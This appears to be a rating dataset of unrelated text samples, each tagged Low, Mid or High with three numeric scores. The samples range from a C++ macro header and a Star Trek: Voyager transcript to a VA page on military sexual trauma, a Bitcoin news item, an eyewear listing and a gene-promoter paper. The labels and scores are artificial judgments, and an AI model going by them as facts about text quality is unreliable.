The implementation causes error C3281 (global operator cannot have
managed type in signature) for managed code.
*/
#define ENUM_CLASS_FLAGS_OPERATORS(TEnum) \
constexpr TEnum operator~(TEnum a) noexcept { \
return static_cast<TEnum>(~static_cast<std::underlying_type<TEnum>::type>(a)); \
} \
constexpr TEnum operator|(TEnum a, TEnum b) noexcept { \
return static_cast<TEnum>( \
static_cast<std::underlying_type<TEnum>::type>(a) | static_cast<std::underlying_type<TEnum>::type>(b)); \
} \
constexpr bool operator&(TEnum a, TEnum b) noexcept { \
return !!(static_cast<std::underlying_type<TEnum>::type>(a) & static_cast<std::underlying_type<TEnum>::type>(b)); \
} \
constexpr TEnum operator^(TEnum a, TEnum b) noexcept { \
return static_cast<TEnum>( \
static_cast<std::underlying_type<TEnum>::type>(a) ^ static_cast<std::underlying_type<TEnum>::type>(b)); \
} \
inline TEnum &operator|=(TEnum &a, TEnum b) noexcept { \
return reinterpret_cast<TEnum &>( \
reinterpret_cast<std::underlying_type<TEnum>::type &>(a) |= \
static_cast<std::underlying_type<TEnum>::type>(b)); \
} \
inline TEnum &operator&=(TEnum &a, TEnum b) noexcept { \
return reinterpret_cast<TEnum &>( \
reinterpret_cast<std::underlying_type<TEnum>::type &>(a) &= \
static_cast<std::underlying_type<TEnum>::type>(b)); \
} \
inline TEnum &operator^=(TEnum &a, TEnum b) noexcept { \
return reinterpret_cast<TEnum &>( \
reinterpret_cast<std::underlying_type<TEnum>::type &>(a) ^= \
static_cast<std::underlying_type<TEnum>::type>(b)); \
}
#else // !__cplusplus
#define ENUM_CLASS_FLAGS_OPERATORS(TEnum)
#endif // !__cplusplus
/**
Macros to help share enums between C++ and CX.
Enums must derive from int (the default)
Flag enums must derive from unsigned int
*/
#if defined(_WINRT_COMP) && !defined(__clang__)
#define EXPOSE_WINRT_ENUM public
#define EXPOSE_WINRT_FLAGS_ENUM [::Platform::Metadata::Flags] EXPOSE_WINRT_ENUM
#else
#define EXPOSE_WINRT_ENUM
#define EXPOSE_WINRT_FLAGS_ENUM
#endif
/**
Macros to force placement of symbols into a particular segment.
For example on iOS ensure large globals aren't placed in the text
segment because there is a size limit enforced by Apple.
*/
#if MS_TARGET_APPLE
#define DATA_SEGMENT_CONST __attribute__((section("__DATA,__const")))
#else
#define DATA_SEGMENT_CONST
#endif
#if __GNUC__
#define __forceinline __attribute__((always_inline, unused))
// Stub __declspec in GCC
#define __declspec(s)
#endif
#endif // MSO_COMPILERADAPTERS_CPPMACROS_H
| Low | [
0.48872180451127806,
32.5,
34
] |
[Femoroacetabular impingement as a cause of inguinal pain]. Femoro-acetabular impingement is an anatomical disturbance of the hip, caused by a deformity of the acetabulum, femur or both that causes an abnormal contact between both structures during certain movements. Its prevalence is 10 to 15% and causes chronic inguinal pain. It can be confused with several other causes of inguinal pain such as hernias, facet syndromes, a renal colic, etc. Patients with this condition are usually young individuals with inguinal pain that may appear after a minor trauma. During examination, pain may be elicited by infernal rotation and abduction movements of hip, flexed in 90 degrees . Plain hip X ray is the most commonly used diagnostic method. Non-steroidal anti-inflammatory drugs and physical therapy can be used to alleviate pain, but the definitive treatment is surgical. | High | [
0.656934306569343,
33.75,
17.625
] |
"Good health, strong body, clear mind." "And you." "Your hospitality your generosity, your patience." "Many thanks." "My colleague's behavior... our apologies." "consul, I assure you, I intended..." "please make her quiet." "Captain, please." "I understand." "Good health, strong body, clear mind." "And you." "Your journey home short and safe." "Captain's Log, Stardate 50425.1." "Mr. NeeIix and I have completed our three-day trade mission with the Tak Tak, one of the more unusual species we've encountered in the delta Quadrant." "We are en route back to Voyager" "Oh..." "I've always been taught to be tolerant of other cultures and points of view-- no matter how aIien-- but I have to say that the Tak Tak are the most unforgiving people I've ever met." "They are a little impatient." "They make the klingons look sedate." "I may never put my hands on my hips again." "You had no way of knowing you were making one of the worst insults possible." "obviously, they've never heard of "forgive and forget."" "It's a good thing you were there, Mr. NeeIix." "I might have been shot at dawn." "I have studied chromoIinguistics," "American Sign Language, the gestural idioms of the Leyron, but I just couldn't get the hang of the Tak Tak." "It seemed like more than just a language to me, Captain." "A Iot of their gestures, from what I couId tell, were rituaIistic-- you might even say superstitious." "You have a genuine flair for diplomacy, Mr. NeeIix." "I may have to promote you... from morale officer to ambassador." "With all the species we're bound to meet," "I couId use a man like you at the front door." "Ambassador NeeIix." "I Iike the sound of that." "We're approaching the rendezvous coordinates." "Dropping to one-quarter impulse." "Voyager's not there." "And they're not responding to halls." "I'm running a Iong-range scan." "There they are." "They're holding position in Sector 38." "Coordinates 121 mark 6." "That's over a Iight-year away from here." "The ship appears to be adrift." "They could be in trouble." "Engaging maximum warp." "Janeway to Voyager" "Commander Chakotay, respond." "The ship looks perfectly fine." "There's no sign of any external damage." "Is there any sign of the crew?" "There's some kind of bioelectric interference." "I can't get clear life sign readings." "The escape pods are all in place and there's no indication of any recent transporter activity." "Grab a phaser, Ambassador." "We're going to get some answers." "still no sign of the crew, but these sensor readings are highly erratic." "The bioelectric field is permeating the ship." "Where's it coming from?" "I can't localize it." "Let's try accessing the ship's internal sensors." "See if we can get a better reading." "Same problem." "The main computer's off-Iine." "So is the com system." "This is strange." "One of the bio-neuraI gel packs in the Mess hall ruptured, but most of the systems in there seem to be functioning normally." "Let's get to the Bridge." "Someone was doing maintenance work on this power relay." "AII the equipment is still active, but the work hasn't been completed." "It's almost as if they dropped what they were doing and ran." "Come on." "This certainly isn't the welcome home I was expecting." "Me neither, but if there was an attack of some kind, why didn't Chakotay try to contact us or send out a warning buoy?" "I'm picking up a com signal about ten meters ahead." "It's coming from inside this room." "This is Ensign WiIdman's quarters." "Is she in there?" "I can't tell." "Let's take a look." "Stand ready." "Coming up next, our very special guest, Ensign KapIan." "She's going to be sharing her..." "Here's our com signaI-- your Good Morning, Voyager program." "Ensign WiIdman is one of my most dedicated viewers." "According to the time index, she activated this program approximately 1 1 hours ago." "Why is it still running?" "The program is set for automatic playback until it's turned off." "The baby's missing, too." "According to the protein decay," "I'd say Ensign WiIdman replicated this... 1 1 hours ago." "When we get to the Bridge, we'II check the communications logs." "They might tell us whether or not..." "There!" "I can't tell if it's humanoid, but it's emanating a bioelectric field." "Whatever it is, it just ran into a dead end." "Over here." "Something just punched right through this floor panel into the Jefferies tubes." "What is it?" "Some sort of mucilaginous compound." "High concentrations of amino acids, proteins... and fragments of non-humanoid DNA." "well, Ambassador," "I'd say we've got an unexpected guest." "Somehow, I don't think he's the diplomatic type." "Main power is faiIing and the environmental controls are going off-Iine." "Systems are starting to shut down one by one." "We'd better get to the Bridge." "Good." "We've still got auxiliary power." "Deck 1." "It's getting awfully hot in here." "When environmental controls fail, heat from the warp plasma conduits can't be vented." "Expect a heat wave before long." "No problem." "I'm used to it." "I grew up near the Rinax marshIands." "Our summers were the hottest in the sector-- 50 degrees celsius, 90 percent humidity." "And the most vicious IavafIies you've ever seen." "Summers in Indiana were pretty similar when I was growing up." "Except that we had three suns and the IavafIies grew to be six centimeters long." "Six centimeters, eh?" "Insect repellent was a booming business." "There's a Iife-form in the turboshaft." "I'm engaging the manual override." "Uh..." "Captain... it sounds like our guest has brought a few friends." "One more second." "I can't get the pneumatic conduits to..." "That was no IavafIy." "There's no Iife-form in the tube above us." "We're getting out of here." "Are you all right?" "Yes." "Disgusting, but all right." "That's the same muciIaginous compound we saw in the transporter room." "Come on." "What is it?" "Human life signs." "Very faint." "30 or more." "Where are they coming from?" "several decks above us." "I can't pinpoint the location." "Maybe the crew is hiding from the aliens and they set up a defense perimeter." "Maybe." "One thing's for sure-- whoever's up there, they're still alive." "Once we get the main computer on Iine, we'II be able to get a fix on their location." "So hot." "My head is spinning." "You've got a high fever, fluid in your lungs." "Lung." "That alien compound is acting quickly." "Try to hang on." "Just three more decks." "Aye, aye, Captain..." "Captain, go on without me." "I'm not going to leave you here, NeeIix." "I can't..." "I'm so dizzy." "There should be an emergency medical kit up that tube." "I'II bring back something to get you on your feet." "Don't go away." "help!" "Captain!" "I'm coming, NeeIix!" "NeeIix!" "This is Captain Kathryn Janeway of the Federation Starship Voyager to anyone within range." "My ship has been seized by unknown Iife-forms." "Require any and all assistance." "Harry..." "Harry?" "Chakotay." "Captain." "needless to say, I-I thought you were something else." "It won't be long before the other aliens sense you here and try to invade Sick Bay." "We don't have much time to treat you." "Doctor, what's going on?" "What are tho...?" "You've ruptured your dorsal extensor muscle and bruised two ribs." "I'm going to have to perform minor surgery." "Lie on your side and try to remain perfectly still." "Oh..." "tell me what's happened." "Voyager has been infected by a macrovirus." "A macrovirus?" "A form of Iife I've never encountered-- or even imagined." "What about the crew?" "Captain..." "I promise, I will tell you exactly what happened if you just lie still." "shortly after you'd left for the Tak Tak homeworId, we received a distress call from a nearby mining colony... a race called the Garans." "They were experiencing what appeared to be a minor viral outbreak." "Fever... disorientation." "I think it's some kind of virus." "Nothing serious, but if we don't stop it now, we'II be forced to shut down the operation." "We may be able to help you." "Doctor?" "A synthetic antigen may do the trick." "However, it will have to be modified for the specific virus." "I'd Iike to beam down to the mining colony and examine a few of the infected." "An away mission." "I'm the only member of this crew who can successfully enter a contaminated environment without risk." "Besides, I've been looking forward to spreading my wings." "Good enough." "It'II take us about three hours to reach you." "Thank you, Commander." "I don't think we'II..." "be going anywhere." "Prepare to download my program into the autonomous emitter." "Yes, Doctor." "They're not responding to our halls." "Life signs." "There's a Iot of bioelectric interference." "I can't get a clear reading." "Perhaps their condition is more serious than they thought." "I better get down there." "Doctor, don't forget." "You're not invulnerable." "If anything happens to that portable emitter, your program could be lost." "Don't worry, Commander." "I've been studying the starfleet guidelines for away team members." "For this particular scenario" "medical Emergency on alien Terrain-- it is recommended that we keep an open com channel at all times." "You heard the man." "channel open." "Away team to Voyager" "Transport was successful, and my portable emitter is working perfectly." "I am scanning the mine shaft and proceeding on vector 147." "Ambient temperature is 16 degrees celsius." "Cavern illumination is minimal, but shouldn't pose a problem for my optical sensors." "The cave walls are comprised of granite with a mixture of pyroclastic..." "Doctor, I appreciate your attention to detail, but we don't need that much information." "Let us know when you've found the miners." "Oh." "Very well." "Stand by then." "Voyager, I've found one of the miners." "He appears to be suffering from the advanced stages of severe viral infection." "Can you treat him?" "Not without a more specialized immunizing agent." "This is curious." "The virus has begun to concentrate in a region near his neck, and it's using his glandular tissue to create some sort of..." "orifice." "Something is emerging." "A Iife-form." "Commander, I think I've just discovered a completely new form of Iife." "From what I can tell, it appears to be... a macroscopic version of the virus." "You mean the virus has grown." "Yes." "By a factor of billions." "The virus absorbed the miner's growth hormones into its protein structure and used them to increase its own mass and dimensions." "In essence, the virus has found a way to leave the microscopic world and enter the macroscopic worId-- our world." "It's a remarkable evolutionary development." "The virus appears to be attracted to infrared radiation." "It's mistaking my hoIo-matrix for body heat." "At the moment, this one's approximately" ".5 millimeters in diameter, but it's continuing to grow at a rate of 30 microns every second." "Commander, permission to beam the virus aboard for further analysis." "No." "The virus isn't in our database." "The biofiIters might not recognize it." "You'II have to settle for tricorder data." "Very well, but I think I should..." "Stand by, Voyager" "hold on." "Stop." "You... you've got to help us." "I intend to, but first I must return to my ship and prepare an antidote." "Oh, take me with you." "I'm afraid that's not possible." "We'd risk infecting the crew." "You can't..." "leave me." "please." "Commander Chakotay, perhaps if we established a force field around Sick Bay and beamed victims directly..." "I'm sorry, but I'm afraid we can't take the chance." "But these people need..." "Doctor, away team guidelines specifically forbid the transport of unknown infectious..." "Of unknown infectious agents onto a starship without establishing containment and eradication protocols." "I understand." "I'II do my best to help you." "Away team to Voyager" "One to beam up." "Doctor to Bridge." "Checking the biofilters." "It appears several viral organisms were beamed up as well." "The biofilter has isolated them." "Purge the filters." "Aye, sir." "Purging is complete." "I'II be in Sick Bay." "What I didn't realize was that, in the few seconds it took me to purge the filters, some of the virus had already migrated into the transporter buffer." "Any luck?" "I'm creating a synthetic antigen that will inhibit the virus's ability to replicate, but I haven't quite figured out how to restore the infected cells to their original condition." "As for the larger versions of the viruses-- what I've termed the macrovirus" "I would suggest a flyswatter." "How long before the antigen's ready?" "I'd say another 12 hours." "That gives us time to rendezvous with the Captain." "We'II deal with this after she's aboard." "Commander, I'd Iike to apologize for my overzealous behavior on the away mission." "Compassion is nothing to be sorry about, Doctor." "It won't be the Iast time you're faced with a moral dilemma in the field." "But if it makes you feel any better, your performance was..." "exemplary." "Thank you." "I told you he'd understand." "Yes." "You did." "We continued working on the antigen." "unfortunately, the macrovirus was working faster." "It had already moved from the transporter buffer into an adjacent system." "B'EIanna, thank God you're here." "The natives are getting restless." "What's the emergency?" "well, I volunteered to help out while NeeIix is away on the trade mission." "The heating array overloaded." "It incinerated a 12-kiIo pot roast and all the food replicators went off-Iine." "Mmm." "Looks delicious." "Maybe there's a problem with the bio-neuraI gel pack in the replicator panel." "actually..." "I'm a pretty good cook when Engineering's doing its job." "Oh, so this is my fault." "well, the gel packs are your department, aren't they?" "Besides, what was I supposed to tell all these hungry, irritable people?" "You know, I think that there's a plasma relay on Deck 7 that really needs repairs." "Oh, no, you can't leave me now, Lieutenant." "Oh, you need me." "I'm touched." "What's going on here?" "It looks like this gel pack has an infection." "half the neurodes have been burned out and the pack is filled with some kind of mucilaginous compound." "Tom, call the Doctor and tell him..." "B'EIanna!" "Were any other gel packs infected?" "No, just the one in the Mess hall." "The ship is healthy." "It's the crew we have to worry about." "Your bones have healed, but the surrounding tissue will be sensitive for a few days." "It's getting warmer in here." "I'm afraid it's not just the ship, Captain." "It's also you." "You've been infected with the macrovirus." "You're experiencing a high fever." "Yes, on the Bridge, I was bitten by one of them." "Your glandular system is already being affected." "If I don't treat you now, you'II end up like the rest of the crew." "I've spent the past few hours perfecting the antigen... but I haven't tested it on a live subject yet." "Looks like I'II have to be your guinea pig, Doctor." "The crew-- why are they all in the Mess hall and the cargo bays?" "I believe the larger macroviruses are driven by some sort of instinct to assemble their host population." "tell me what happened after B'EIanna was exposed to the infected gel pack." "I was faced with an imminent epidemic." "Oh, no." "Doctor to the Bridge." "The macrovirus is on board Voyager and appears to be... airborne." "I suggest a IeveI-4 quarantine of the Mess hall and all adjoining sections." "acknowledged." "Red alert." "Initiate IeveI-4 quarantine protocols on Deck 2." "Aye, sir." "AII hands, this is Commander Chakotay." "We've detected an airborne virus in the Mess hall." "Deck 2 is under quarantine." "No crew member, repeat, no crew member is to leave or enter any section on Deck 2." "Stand by for further instructions." "I've erected the biocontainment fields." "The area has been sealed." "We managed to avoid a ship-wide outbreak, but every crew member on Deck 2 had been contaminated." "I collected a single live specimen of the macrovirus, and returned to Sick Bay in hopes of finding a cure." "Ready, Doctor." "optimal magnification." "The specimen has synthesized" "B'EIanna's growth hormone into its own structure." "excellent." "That should give us the information we need to destroy the virus without killing its host cells." "The virus has grown by 150 microns." "Its rate of growth shouIdn't hinder our analysis, as long as its genetic structure stays the same." "Doctor..." "Computer, erect a IeveI-3 force field around the microscope station." "well, so much for lunch." "I may never look at food again." "I thought KIingons didn't get nauseated." "You have a redundant stomach." "well, right now... they're both unhappy." "Paris to Sick Bay." "Go ahead, Lieutenant." "I just saw two macroviruses come out of B'EIanna's neck." "Stand by, Mr. Paris." "We're close to formulating an antigen." "The virus has grown to .3 meters." "On the microscopic level, the virus uses that needIe-Iike projection to penetrate a cell membrane." "On our level, it probably impaIes its victim in much the same way infusing him with its own genetic code." "The antigen is ready." "Kes..." "Computer, deactivate force field." "well... one down, ten billion to go." "Eager to inoculate those already infected," "I quickly headed for the quarantined area." "Though their condition had grown worse, it was the least of our problems." "Lieutenant... if you can hear me," "I'm going to give you an injection." "It should eliminate the virus." "What?" "What is that?" "You don't want to know." "Doctor to the Bridge." "Intruder alert." "Deck 2, Section 13." "Within minutes, dozens of the larger organisms forced their way beyond Deck 2 and overwhelmed the ship." "It wasn't long before the crew was incapacitated." "although I've developed an effective vaccine," "I can't administer it." "Every time I try to get to the crew, I'm attacked." "Perhaps with your help." "How many of the larger macroviruses are there?" "I have no way of knowing." "Dozens, perhaps hundreds." "They're replicating at an exponential rate." "By this time tomorrow, there could be thousands." "Speak of the devil." "You're cured." "The question is:" "How do we cure the rest of the crew?" "This antigen-- can it be distributed in a gaseous form?" "For absorption via the respiratory system?" "I've already considered dispensing it through environmental controls." "But they're off-Iine and I have limited engineering expertise." "Leave that to me." "AII we have to do is get to environmental control on Deck 12." "Easier said than done." "We'II run into the same problem I faced when I tried to get to the Mess hall." "Not if I can help it." "Prepare two canisters of antigen." "We'II split up and take different routes to environmental control." "It'II double our chances." "If you get there first, call me and I'II talk you through the repairs." "The macroviruses are attracted to infrared radiation." "Set your tricorder to emit a thermal scattering signal." "It will make it more difficult to target you." "Ready when you are." "We'II be right with you." "Take Jefferies Tube 1 1." "What's wrong?" "I've been studying the ship's infrastructure and I'm familiar with most of it, but how do I get there from here?" "Jefferies Tube 1 1." "Take a left at Section 31." "Head straight down past the tractor beam emitter until you hit Deck 10." "Get out at Section 3 and follow the corridor all the way around..." "until I hit the shuttle bay." "Then I crawl through Access Port 9, go past three airIocks and then two decks down." "environmental control's at the end of the hall." "Now I remember." "Who designed this ship, anyway?" "Good luck." "Doctor to Captain Janeway." "Go ahead." "I won't be joining you as soon as I'd hoped." "The macroviruses overwhelmed me on Deck 10 and my portable emitter was nearly destroyed." "I've taken refuge inside the shuttle bay in a shuttlecraft." "Stay put, Doctor." "I'm close to environmental control." "Janeway to Doctor." "I've got the environmental controls back on Iine." "Set the dispersal nodes to one part per thousand." "What's going on?" "I'm not sure, but I think someone's firing at Voyager" "Doctor, use the shuttle's sensors to find out what's happening and patch the data to me." "Aye, Captain." "It's the Tak Tak." "Doctor, open a channel and hail their Captain." "Stand by." "consul, this is Captain Janeway." "Why are you firing at us?" "The Garan mining colony, infected." "We purified them." "Your distress call received." "Voyager infected." "We are purifying you." "Purifying?" "You're trying to destroy us." "No choice." "No cure for the virus." "Voyager's existence a threat." "Your illness." "Our apologies." "Wait." "We've developed a cure." "But your torpedoes just stopped us from getting it to our crew and putting an end to this." "Cure?" "Yes." "A synthetic antigen." "We've tested it, and it works." "I can prove it to you." "And I'd be willing to share the antigen with your people, but first, you've got to stop attacking my ship." "Give me a chance to save my crew." "A chance." "One hour." "Doctor, we've got a problem." "That last torpedo destroyed the secondary power couplings." "I can't get the environmental controls back on Iine." "We appear to be low on options." "The only systems we still have access to are the ones with independent power sources-- shuttIecraft, Iife-support, the holodecks..." "Doctor, you said the macroviruses are attracted to infrared signatures." "That's right." "Right now, you and I are the only targets left on board." "What if we gave them something new to sink their teeth into?" "What are you suggesting?" "Doctor, it seems to be working." "I've programmed the hoIo-characters to react to the viruses." "We don't have much time." "Grab your hypospray and get to the crew." "You've got a clear path to the Mess hall and both cargo bays." "acknowledged." "What about you, Captain?" "I've put together what you might call an "antigen bomb."" "Now all I have to do is drop it." "Doctor to Captain Janeway." "Captain, please respond." "Go ahead." "It worked." "The macroviruses have been destroyed." "And the ship?" "There was heavy damage suffered on HoIodeck 2, but there are no hull breaches in evidence." "Astonishment." "Your vessel, purified." "And we'd be willing to share the cure with you, if you'd be kind enough to forego destroying our ship." "Of course, of course." "Purification will cease." "My word." "Many thanks, Captain of Voyager" "Good health." "Good health." "Come in." "Good morning, Captain." "Here's an update on repairs." "How's the crew holding up?" "They're fine, although the Doctor tells me a few people are still reporting post-viraI queasiness." "I'm not surprised." "Inform the crew that I'm granting extended RR for all personnel and work out the shift rotations." "Aye, Captain." "Speaking of RR... a few of us are going skiing on the hoIodeck-- the Ktarian glaciers." "Fresh air, good workout." "Care to join us?" "No, thank you, but have fun." "Not your cup of tea?" "Oh, on the contrary, I Iove to ski." "Let's just say..." "I've had enough of a workout for the time being." "Understood." | Mid | [
0.538720538720538,
40,
34.25
] |
package com.ray.library.view.view.baseadapter.animation; import android.animation.Animator; import android.animation.ObjectAnimator; import android.view.View; /** * https://github.com/CymChad/BaseRecyclerViewAdapterHelper */ public class SlideInRightAnimation implements BaseAnimation { @Override public Animator[] getAnimators(View view) { return new Animator[]{ ObjectAnimator.ofFloat(view, "translationX", view.getRootView().getWidth(), 0) }; } } | Mid | [
0.541832669322709,
34,
28.75
] |
AMP Camp 6 was held at UC Berkeley and live-streamed online on November 19 and 20, 2015. Videos and exercises from the event are available on the AMPCamp 6 page. AMP Camps are Big Data training events organized by the UC Berkeley AMPLab about big data analytics, machine learning, and popular open-source software projects produced by the AMPLab. All AMP Camp curricula, and whenever possible videos of instructional talks presented at AMP Camps, are published here and accessible for free. About the AMPLab The UC Berkeley AMPLab works at the intersection of machine learning, cloud computing, and crowdsourcing; integrating Algorithms, Machines, and People (AMP) to make sense of Big Data. | High | [
0.6851385390428211,
34,
15.625
] |
Attention A T users. To access the menus on this page please perform the following steps. 1. Please switch auto forms mode to off. 2. Hit enter to expand a main menu option (Health, Benefits, etc). 3. To enter and activate the submenu links, hit the down arrow. You will now be able to tab or arrow up or down through the submenu options to access/activate the submenu links. Effects of Sexual Trauma One in five women in the United States reported experiencing rape at some time in their lives, according to the Centers for Disease Control and Prevention (CDC) 2012 study* Sexual violence, or sexual trauma, can have a profound impact on a victim’s physical and mental health. It is associated with an increased risk of a range of sexual and reproductive health problems and can lead to other long-term health problems, including chronic pain, headaches, and stomach problems. Victims of sexual trauma are more likely to abuse drugs or alcohol or engage in risky sexual behavior. In some cases, anger and stress stemming from such abuse trigger eating disorders, depression, and even suicide. Learn more from the CDC.* Military Sexual Trauma VA refers to sexual assault or repeated, threatening sexual harassment during military service as military sexual trauma (MST). Approximately one out of five women who visits VA facilities tells their VA health care provider they experienced sexual trauma in the military. To help Veterans recover from MST, VA provides free care for related physical and mental health conditions. Veterans do not need to have a service-connected VA disability rating; they may be able to receive MST care even if they are not eligible for other VA care. Learn more about treatment for MST. Every VA facility has a designated MST Coordinator who serves as a contact person for MST-related issues. This person can help Veterans find and access VA services and programs, state and federal benefits, and community resources. Every VA facility also has providers knowledgeable about treatment for the effects of MST. For more information about services available, Veterans can speak with their existing VA health care provider, contact the MST Coordinator at their nearest VA Medical Center, or contact their local Vet Center. Learn more from the National Center for PTSD (196.7 KB, PDF). About Women Veterans Women are now the fastest growing subgroup of U.S. Veterans. The number of women Veterans is expected to increase dramatically in the next 10 years, and VA health care is expected to be in high demand by the women Veterans of Operation Enduring Freedom and Operation Iraqi Freedom. The Department of Veterans Affairs understands the health care needs of Women Veterans and is committed to meeting these needs. Women Veterans served and they deserve the best quality care. Learn more about VA health care services for women Veterans. | Mid | [
0.5726495726495721,
33.5,
25
] |
Long-time Bitcoin HODLer and Skater legend Tony Hawk will be speaking in March next year at the “Bitcoin in 2020″conference in San Francisco. Tony Hawk is a big Fan of Bitcoin. In fact, he hodlt the world’s largest Cryptocurrency, according to his own statement, already since 2013 as a Bitcoin of $ 1,000 was. As he has tweeted in may as a response to a Chart, “riding” it, Bitcoin already for 6 years. Been riding it for 6 years. Haven’t bailed yet— Tony Hawk (@tonyhawk) May 29, 2019 Tony Hawk speaks on the Bitcoin 2020 And now Hawk is at the centre of one of the most important Bitcoin conferences of the year. Bitcoin 2020 will be held from 27. to 28. March held in San Francisco and has just announced, is Hawk there speak. The message came yesterday from the venue, and the Hawk responded on Twitter. Many are glad that your Hero from teenage days of sitting in the Kryptozug and even active in the industry. As one user on Twitter put it: “If you don’t already great enough were…” In fact, it is a great Moment for the professional Skateboarder who is known the world over for its impressive achievements. He was the first who performed the 900 in Skateboarding, among other things, that is why he is admired by many as one of the best of all time. Now Hawk is taking part in the Bitcoin Revolution – and if you’re both Hawk and Bitcoin Fan, you love probably the most. Hawks History It is not yet sure what will discuss Hawk finally, in his lecture – but we will probably hear stories about how he first learned of Bitcoin. He hodlt since 2013, and many want to know who has led him so pre early to Bitcoin. It is also nice to see a crypto-enthusiasts celebrity that has no fraud in the sense. Hopefully we will get during his presentation some of the answers as to why this professional, world-famous Skateboarder has decided to give the world’s first crypto-currency to trust. Overall, Hawk is a welcome addition to the Bitcoin 2020. Coin-Update.de is a pure information platform, created to the best of our Knowledge and belief content. Completeness, accuracy, timeliness, and accuracy cannot be guaranteed, this is also true for exchange rate movements and information. On Coin Update published content, opinions, information, etc. are used exclusively for Information purposes and are not geared to individual requirements investment advice, and not knowledgeable. The published content neither buy nor sell recommendations by financial instruments, nor are they to be understood as a guarantee or warranty of certain price movements. The analyses, opinions, estimates, information or simulations to the historical price or value development of a financial instrument, as well as forecasts for future events, or developments, of the financial instruments presented are not reliable and sound indicators of value development. Historical events are not a guarantee of future profits. Forecasts also contain unforeseeable risks and factors that can be estimated from the outset, never a hundred percent. This may lead to actually occurring events, price movements and other factors that differ considerably from the on Coin Update published information. In addition, obliged to Coin Update, to keep track of the forecasts, or be adapted later on. Investments in digital currencies are associated with high risk, the total loss cannot be ruled out and is possible at any time. The use of the information in this media platform is at the user’s own risk. The contents of the Coin-Update are only opinions and are not subject to any quality control, as a basis for decision-making, in particular for the financial investment, or investment that is suitable, and are intended solely for General Information and discussion. In the case of Coin-Update is not investment advice, purchase or sale recommendations or make informed predictions about the value of development. The content published on Coin Update, this represents only the opinion of the author or authors. The contents do not constitute advice in the broadest sense, and is no substitute for individual legal or tax advice. | Mid | [
0.651595744680851,
30.625,
16.375
] |
Finally have a pair of Hiu M. L. on November 27, 2016Color: Tortoise; Size: L Finally have a pair of prescription sunglasses. And I love them. And how accommodating and patient eyebuydirect's customer service was, as I struggled to find a pair that fit my prescription and my face. I wear these everyday. Was this review helpful?(4) I love my new glasses! on July 12, 2016Color: Black; Size: L I am in love with the 4 new pairs of glasses I got! The process was simple and convenient. I am getting complements all the time on my new glasses. Was this review helpful?(4) Read all reviews Try On DimensionsShow in inchesShow in mm Full screen DimensionsShow in inchesShow in mm Full screen Full screen Full screen Similar Styles Somebody New$73 Ferris$83$41.50 Silicate$83$41.50 Write a Product Review Verona - Black Select between 1 to 5 stars Rate this frame Headline or summary of your review Write a product review Our frame sizes EyeBuyDirect offers 4 different frame sizes (XS, S, M, L) so choosing the right one is key to making sure your new glasses correctly fit your face. Each size group is based on frame width and lens height My frame size Take your current frame and measure its total width (from temple screw to temple screw) and its lens height. Once you have both numbers, enter the results in the fields below to find your best fit Frame width Lens height My frame widthmminch My lens heightmminch My best fit(s): We advise you to also check your frame dimensions to ensure you've got the best fit for your face. | Low | [
0.47368421052631504,
30.375,
33.75
] |
Background ========== The smoothelin-like 1 (SMTNL1 \[Swiss-Prot: [Q99LM3](Q99LM3)\]) protein was discovered as a novel protein phosphorylated in response to cGMP stimulation of ileal smooth muscle tissue \[[@B1]\]. The protein contains a calponin homology domain at its carboxy-terminus, thus it was originally termed the calponin homology-associated smooth muscle protein (CHASM). Experiments completed *in situ*with isolated smooth muscle tissues suggest a physiological role for SMTNL1 in promoting the relaxant actions of PKA/PKG \[[@B1],[@B2]\], and studies with *Smtnl1*genetic knock-out mice link SMTNL1 with adaptive responses to exercise in both smooth and skeletal muscle \[[@B3]\]. More recent studies have provided indications that SMTNL1 also governs smooth and skeletal muscle adaptations during sexual development and pregnancy \[[@B4]\]. Although less well studied at the molecular level, current data suggests SMTNL1 plays an important regulatory role in smooth muscle contraction and development. The protein is known to interact with tropomyosin \[[@B5]\] and with apo-calmodulin in a Ca^2+^dependent manner \[[@B6]\], to inhibit myosin phosphatase activity \[[@B2],[@B3]\] and to regulate the expression of the myosin phosphatase targeting subunit (MYPT1) \[[@B4]\]. As its name suggests, SMTNL1 is closely related to the smoothelin family of proteins (SMTN) that are used as markers for contractile smooth muscle cell differentiation \[[@B7],[@B8]\]. The specific biological role of the two SMTN isoforms, A (short isoform, predominantly visceral expression) and B (long isoform, predominantly vascular expression), remains poorly defined; however, the analysis of mice lacking SMTN-A or -B has revealed critical roles for each of the proteins in intestinal and vascular smooth muscle performance, respectively \[[@B9],[@B10]\]. Interestingly, the SMTN-A and SMTN-B isoforms are expressed from alternative promoters, with the intragenic promoter of SMTN-A residing within exon 10 of the *Smtn*gene \[[@B11]\]. Thus, one *Smtn*gene gives rise to both SMTN-A and SMTN-B mRNA with lengths of 1700 and 3000 nt, respectively. The *Smtn*promoter is controlled by serum response factor (SRF) and myocardin \[[@B12]\]. SRF and myocardin play critical roles in the expression and regulation of growth-responsive genes as well as the expression of virtually all smooth muscle specific genes, such as calponin, myosin heavy chain, α-actin and SM-22 \[[@B13],[@B14]\]. Previous analyses of various smooth muscle and general tissues by immunohistochemistry and Western blotting have revealed strong expression of SMTNL1 in MHC-2A skeletal muscle fibers, moderate expression in smooth muscle tissues (e.g., bladder, ileum, uterus and aorta) and no expression in MHC-I/b cardiac muscle \[[@B3]\]. Given that SMTNL1 is expressed in multiple muscle types, it was expected that *Smtnl1*transcriptional regulation might differ from the other smoothelin family members. To date, the contribution of the SMTNL1 protein in smooth muscle contraction has been examined *in vitro*and *in vivo*\[[@B1]-[@B6]\], but investigations of its gene and transcriptional regulation are still lacking. Thus, in this study, we identify and characterize key regulatory elements of the promoter region in the mouse *Smtnl1*gene. This region contains a TSS mapped to a location 119 bp downstream of the NCBI-predicted site. Our data demonstrate that a proximal promoter region is located within 118 bp of the TSS site and provide molecular insights into the regulation of the *Smtnl1*gene. Results and Discussion ====================== PCR analysis of Smtnl1 transcript --------------------------------- We first examined the pattern of *Smtnl1*expression in skeletal muscle and representative smooth muscle tissues with RT-PCR. As shown in Figure [1A](#F1){ref-type="fig"}, the *Smtnl1*transcript is expressed at very low levels. *Smtnl1*expression in skeletal and aortic smooth muscle tissues was detectable following 35-cycles of amplification; however, transcript was not detected by RT-PCR in other smooth muscle beds. To increase the sensitivity of detection, we then performed nested PCR reactions on the primary products. This step also increased the specificity of the PCR reaction and permitted qualitative verification of *Smtnl1*expression. We detected *Smtnl1*expression by nested PCR in the muscle tissues selected for analysis. The nested-PCR amplicons were sequenced and align 100% to the *Smtnl1*sequence. Due to its low abundance, we were unable to accurately assess the expression levels in 